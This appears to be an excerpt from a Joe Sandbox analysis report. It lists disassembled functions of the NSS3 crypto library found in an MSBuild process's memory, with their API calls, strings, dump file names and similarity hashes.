PR_LogPrint.NSS3(?,00000000), ref: 6C6BAEA0

Strings

hSession = 0x%x, xrefs: 6C6BAE01, 6C6BAE11
nyl, xrefs: 6C6BAEB8, 6C6BAEE6
(CK_INVALID_HANDLE), xrefs: 6C6BAE1F, 6C6BAE80
C_MessageSignInit, xrefs: 6C6BADE1
hKey = 0x%x, xrefs: 6C6BAE62, 6C6BAE72

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nyl
API String ID: 332880674-862247975
Opcode ID: 75497fa28d1b951e484bafa4cd13016fac4bdc9b03d1a7468263ec57dc78cd98
Instruction ID: 9a3c24c106e48cd47fe68a3f99b64657df2ac331565b67c0880361e9a05f09ba
Opcode Fuzzy Hash: 75497fa28d1b951e484bafa4cd13016fac4bdc9b03d1a7468263ec57dc78cd98
Instruction Fuzzy Hash: 9431F872600118ABCB00DF54DD8CBAE77B5AB4A319F444434F408BB712DF30992ADBAA

Function 6C6B2DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C6B2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B2E33

Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6B2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C6B2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C6B2E81

Strings

C_InitPIN, xrefs: 6C6B2DF1
pPin = 0x%p, xrefs: 6C6B2E63
hSession = 0x%x, xrefs: 6C6B2E0E, 6C6B2E1E
nyl, xrefs: 6C6B2E99, 6C6B2EC4
ulPinLen = %d, xrefs: 6C6B2E7C
(CK_INVALID_HANDLE), xrefs: 6C6B2E2C

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nyl
API String ID: 1003633598-2977378113
Opcode ID: 6564dad241c31e3c869a29d0a38b3085f0ac1c6c9725e18d0b95e20844653be9
Instruction ID: 7f4a44d5418c0e6797b813f086880dac7da76bd173875a1f46f2b143959ac7e8
Opcode Fuzzy Hash: 6564dad241c31e3c869a29d0a38b3085f0ac1c6c9725e18d0b95e20844653be9
Instruction Fuzzy Hash: 7731FB72601119AFDB50DB55DE4CB8A3BB5EB4A31DF044034F808BB751DF309A5ACBAA

Function 6C6C6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C6C781D,00000000,6C6BBE2C,?,6C6C6B1D,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C6C781D,?,6C6BBE2C,?), ref: 6C6C6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C6C6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C6C6C96

Part of subcall function 6C671240: TlsGetValue.KERNEL32(00000040,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671267
Part of subcall function 6C671240: EnterCriticalSection.KERNEL32(?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C67127C
Part of subcall function 6C671240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671291
Part of subcall function 6C671240: PR_Unlock.NSS3(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C6712A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C6C6CAA

Strings

rdb:, xrefs: 6C6C6C69
dbm, xrefs: 6C6C6CA4
extern:, xrefs: 6C6C6C7E
sql:, xrefs: 6C6C6C52
NSS_DEFAULT_DB_TYPE, xrefs: 6C6C6C91
dbm:, xrefs: 6C6C6C3A

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 4c8d923b99ee0cbbd353d3ea38c9c798265d8e1924886d3ec5404d081fbc2961
Instruction ID: 2d30d37ea2a93779e83e56cd5fd5e1867a4e79e21a91423874f49e178ef37175
Opcode Fuzzy Hash: 4c8d923b99ee0cbbd353d3ea38c9c798265d8e1924886d3ec5404d081fbc2961
Instruction Fuzzy Hash: 9D01A7F17023022BE51027795E4AF76269DDF81359F140531FE04E0941EA92E62440AF

Function 6C6FA4E0 Relevance: 19.7, APIs: 13, Instructions: 199COMMON

Download Yara Rule

APIs

PK11_DigestOp.NSS3(?,?,?), ref: 6C6FA56E

Part of subcall function 6C70F2E0: free.MOZGLUE(-00000694,00000000,?,6C712B36,-00000694), ref: 6C70F2F4

PK11_CreateDigestContext.NSS3(00000003), ref: 6C6FA5C6
PK11_CreateDigestContext.NSS3(00000004), ref: 6C6FA5DA
PK11_DigestBegin.NSS3(?), ref: 6C6FA5FC
PK11_DestroyContext.NSS3(?,00000001), ref: 6C6FA61E
PL_HashTableLookupConst.NSS3(00000250), ref: 6C6FA648
PK11_CreateDigestContext.NSS3(?), ref: 6C6FA659

Part of subcall function 6C6AD0A0: SECOID_FindOIDByTag_Util.NSS3(6C6AAE9B,00000000,?,6C6AAE9B,00000000,?,?,?,?,?,?,?,?,?,?,6C682D6B), ref: 6C6AD0B8

PK11_DigestBegin.NSS3(00000000), ref: 6C6FA67A

Part of subcall function 6C6AD800: TlsGetValue.KERNEL32(?,?,-00000001,00000000,00000000,?,6C6ADE75,00000000), ref: 6C6AD841
Part of subcall function 6C6AD800: EnterCriticalSection.KERNEL32(?,?,?,-00000001,00000000,00000000,?,6C6ADE75,00000000), ref: 6C6AD856
Part of subcall function 6C6AD800: PR_Unlock.NSS3(?,?,?,?,-00000001,00000000,00000000,?,6C6ADE75,00000000), ref: 6C6AD887

PK11_CreateDigestContext.NSS3(?), ref: 6C6FA6A0

Part of subcall function 6C6AD0A0: PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C6AAE9B), ref: 6C6AD12B

PK11_DigestBegin.NSS3(00000000), ref: 6C6FA6B3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6FA6CB
PK11_DigestBegin.NSS3(?), ref: 6C6FA6E0

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreate$Error$ConstCriticalDestroyEnterFindHashLookupSectionTableTag_UnlockUtilValuefree
String ID:
API String ID: 1572550097-0
Opcode ID: 7787bfc2ffe692dd462a62e22f8f46f1f347c03e51d0e962e413852700359262
Instruction ID: fdb8fcbdbcd5bd2235e3f720cf486b154941e465e857184eb0197660eba637e7
Opcode Fuzzy Hash: 7787bfc2ffe692dd462a62e22f8f46f1f347c03e51d0e962e413852700359262
Instruction Fuzzy Hash: FA51E8F5A04502ABFB044A75AC44BDAB26BBB4134CF144235DD3886A43FB31E86BC79D

Function 6C67ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C67ACE2
malloc.MOZGLUE(00000001), ref: 6C67ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C67AD02
TlsGetValue.KERNEL32 ref: 6C67AD3C
calloc.MOZGLUE(00000001,?), ref: 6C67AD8C
PR_Unlock.NSS3 ref: 6C67ADC0
free.MOZGLUE(00000000), ref: 6C67AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C67AE58
free.MOZGLUE(00000000), ref: 6C67AE69
free.MOZGLUE(?), ref: 6C67AE78
PR_Unlock.NSS3 ref: 6C67AE8C
free.MOZGLUE(?), ref: 6C67AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C67AEC7

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: bd60b63f7b98cbeeef40d7bae2477e2de889f6df1d2c05ad0a05b5401b5b79b8
Instruction ID: 7f3e86bfae01b0785e2ca7d6b8d411e157f0802e52d1f63a415b3faaccbd3583
Opcode Fuzzy Hash: bd60b63f7b98cbeeef40d7bae2477e2de889f6df1d2c05ad0a05b5401b5b79b8
Instruction Fuzzy Hash: 4951D3B1E001169BDF10DF68DD456AE77B4BB0A349F140975D808A3B12DB31E945CBFA

Function 6C754C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C754CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C754CFD
sqlite3_value_text16.NSS3(?), ref: 6C754D44

Strings

invalid, xrefs: 6C754CF1
unknown error, xrefs: 6C754D56
API call with %s database connection pointer, xrefs: 6C754CF6
no more rows available, xrefs: 6C754D2E
another row available, xrefs: 6C754D20
bad parameter or other API misuse, xrefs: 6C754D05
out of memory, xrefs: 6C754C78, 6C754C9E
abort due to ROLLBACK, xrefs: 6C754D27, 6C754D33

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 9d5c1fe09e99393d2ffb1b037710b34997c8628b5f2ba655317b5bc79be67e24
Instruction ID: 9a161ddbe0c771c63e9db3b4d2ac4b2145efba569db4aabb1dea150a9ee8ce2d
Opcode Fuzzy Hash: 9d5c1fe09e99393d2ffb1b037710b34997c8628b5f2ba655317b5bc79be67e24
Instruction Fuzzy Hash: 5B317A73E08A156BE7044B28AB027E5736177C3318FD50535D9245BE18CF21AC71A3E6

Function 6C6B2CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C6B2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C6B2D07

Part of subcall function 6C7909D0: PR_Now.NSS3 ref: 6C790A22
Part of subcall function 6C7909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C790A35
Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C790A66
Part of subcall function 6C7909D0: PR_GetCurrentThread.NSS3 ref: 6C790A70
Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C790A9D
Part of subcall function 6C7909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C790AC8
Part of subcall function 6C7909D0: PR_vsmprintf.NSS3(?,?), ref: 6C790AE8
Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790B19
Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790B48
Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790C76
Part of subcall function 6C7909D0: PR_LogFlush.NSS3 ref: 6C790C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C6B2D22

Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790B88
Part of subcall function 6C7909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C790C5D
Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C790C8D
Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790C9C
Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790CD1
Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790CEC
Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790CFB
Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790D16
Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C790D26
Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D35
Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C790D65
Part of subcall function 6C7909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C790D70
Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790D90
Part of subcall function 6C7909D0: free.MOZGLUE(00000000), ref: 6C790D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C6B2D3B

Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790BAB
Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790BBA
Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C6B2D54

Part of subcall function 6C7909D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C790BCB
Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790BDE
Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790C16

Strings

pLabel = 0x%p, xrefs: 6C6B2D4F
pPin = 0x%p, xrefs: 6C6B2D1D
slotID = 0x%x, xrefs: 6C6B2D02
nyl, xrefs: 6C6B2D6C, 6C6B2D9A
ulPinLen = %d, xrefs: 6C6B2D36
C_InitToken, xrefs: 6C6B2CE7

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nyl
API String ID: 420000887-2578169290
Opcode ID: d7606ad809b7ba5159e3778546686992b5765966059c35d72a883e7f2f242273
Instruction ID: aa22bb07288b8828b448e285c1615a7ee7f4b03418c65e71b1d3e3c7bfec93b0
Opcode Fuzzy Hash: d7606ad809b7ba5159e3778546686992b5765966059c35d72a883e7f2f242273
Instruction Fuzzy Hash: C521C576200145EFDB40DF94DE8CA853BF1EB4A31DF448134F604A7622DF319969DB66

Function 6C622450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C6224BA
LeaveCriticalSection.KERNEL32(?), ref: 6C62250D
EnterCriticalSection.KERNEL32(?), ref: 6C622554
LeaveCriticalSection.KERNEL32(?), ref: 6C6225A7
EnterCriticalSection.KERNEL32(?), ref: 6C622609
LeaveCriticalSection.KERNEL32(?), ref: 6C62265F
EnterCriticalSection.KERNEL32(?), ref: 6C6226A2
LeaveCriticalSection.KERNEL32(?), ref: 6C6226F5
EnterCriticalSection.KERNEL32(?), ref: 6C622764
LeaveCriticalSection.KERNEL32(?), ref: 6C622898
EnterCriticalSection.KERNEL32(?), ref: 6C6228D0
EnterCriticalSection.KERNEL32(?), ref: 6C622948
LeaveCriticalSection.KERNEL32(?), ref: 6C62299B
EnterCriticalSection.KERNEL32(?), ref: 6C6229E2
LeaveCriticalSection.KERNEL32(?), ref: 6C622A31

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: bbd63d112d31ee0ad65f0b463ebda31d15103897aabc78ed00956f29f3b37796
Instruction ID: 142c85e5bad7f076980dab2e1af690f7ecb388e7018e76c43561d47b88e01398
Opcode Fuzzy Hash: bbd63d112d31ee0ad65f0b463ebda31d15103897aabc78ed00956f29f3b37796
Instruction Fuzzy Hash: 48F1B032B112148BDB05AF60E98DAAA3731BF4B325F29417DD80657A01CB3DE981DFD6

Function 6C6EE400 Relevance: 18.2, APIs: 12, Instructions: 206threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6EC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6EDAE2,?), ref: 6C6EC6C2

SECOID_GetAlgorithmTag_Util.NSS3(-000000D8), ref: 6C6EE4A0
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6EE4B1
SECOID_GetAlgorithmTag_Util.NSS3(-00000010), ref: 6C6EE4C4
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6EE4D2
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,00000000), ref: 6C6EE525
PK11_FreeSymKey.NSS3(00000000), ref: 6C6EE592
PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6C6EE5CF
PR_GetCurrentThread.NSS3 ref: 6C6EE5F2
PR_SetError.NSS3(00000000,00000000), ref: 6C6EE601
PK11_PubUnwrapSymKey.NSS3(?,?,-00000001,00000105,00000000), ref: 6C6EE620
PR_GetCurrentThread.NSS3 ref: 6C6EE632
PR_SetError.NSS3(00000000,00000000), ref: 6C6EE641

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Tag_$AlgorithmK11_$CurrentErrorFindFreeThread$DestroyPrivateUnwrap
String ID:
API String ID: 2900466288-0
Opcode ID: 0eac3b2ac93064644cb83f21769af1c9f6523adbb98fbc26d9b63a11c49cc76a
Instruction ID: bbfd43eed322f18a6a0cb6e40638f46d10afe09d878fa33a5b419a4b0c139413
Opcode Fuzzy Hash: 0eac3b2ac93064644cb83f21769af1c9f6523adbb98fbc26d9b63a11c49cc76a
Instruction Fuzzy Hash: 196195B1A066059FDB10CF68DD84AAB77F8AF49308F54052AD806D7B11F731E909CBA9

Function 6C752D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C752D9F

Part of subcall function 6C60CA30: EnterCriticalSection.KERNEL32(?,?,?,6C66F9C9,?,6C66F4DA,6C66F9C9,?,?,6C63369A), ref: 6C60CA7A
Part of subcall function 6C60CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C60CB26

sqlite3_exec.NSS3(?,?,6C752F70,?,?), ref: 6C752DF9
sqlite3_free.NSS3(00000000), ref: 6C752E2C
sqlite3_free.NSS3(?), ref: 6C752E3A
sqlite3_free.NSS3(?), ref: 6C752E52
sqlite3_mprintf.NSS3(6C7BAAF9,?), ref: 6C752E62
sqlite3_free.NSS3(?), ref: 6C752E70
sqlite3_free.NSS3(?), ref: 6C752E89
sqlite3_free.NSS3(?), ref: 6C752EBB
sqlite3_free.NSS3(?), ref: 6C752ECB
sqlite3_free.NSS3(00000000), ref: 6C752F3E
sqlite3_free.NSS3(?), ref: 6C752F4C

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 14c58a66911de30f3b52e53a6b36a8944abc5c59089c640af8201d8c39f2b25c
Instruction ID: 5d5b390e838190239336ccfd1bf97df3d75b6bed7e6cfd27ec6a9bc92b6cca99
Opcode Fuzzy Hash: 14c58a66911de30f3b52e53a6b36a8944abc5c59089c640af8201d8c39f2b25c
Instruction Fuzzy Hash: 886190B5E002059BEB00CF68D989B9EB7B6EF49348F544038DC15A7741EB31EC65CBA5

Function 6C604C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CB0
PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D97
PR_Lock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604DBA
